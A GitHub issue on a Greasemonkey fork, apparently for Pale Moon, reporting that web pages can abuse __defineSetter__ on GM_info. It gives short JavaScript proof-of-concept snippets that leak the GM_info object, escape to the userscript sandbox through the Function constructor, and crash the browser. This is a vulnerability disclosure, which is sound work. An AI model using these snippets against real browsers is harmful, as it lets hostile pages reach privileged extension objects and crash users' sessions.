search

janekptacijarabaci / greasemonkey

Greasemonkey is a user script manager for Firefox.
http://www.greasespot.net/
Other
92 stars 11 forks source link

setter abuse #20

Open xBZZZZ opened 3 years ago

xBZZZZ commented 3 years ago

note: there needs to be running userscript

web page can get GM_info object like this:

open(location.href).__defineSetter__("GM_info",console.log)

web page can get sandbox object like this:

open("/").__defineSetter__("GM_info",v=>{
  const sandbox=v.toString.constructor("return this")()
  console.log(sandbox)
})

web page can CRASH pale moon like this:

open("/").__defineSetter__("GM_info",v=>{
  const sandbox=v.toString.constructor("return this")()
  new sandbox.XPCNativeWrapper(1)
})
FrostKnight commented 2 years ago

@xBZZZZ

We could use someone to fork this in general, it seems to be either dormant or gone...

If you knew how to fix, feel free.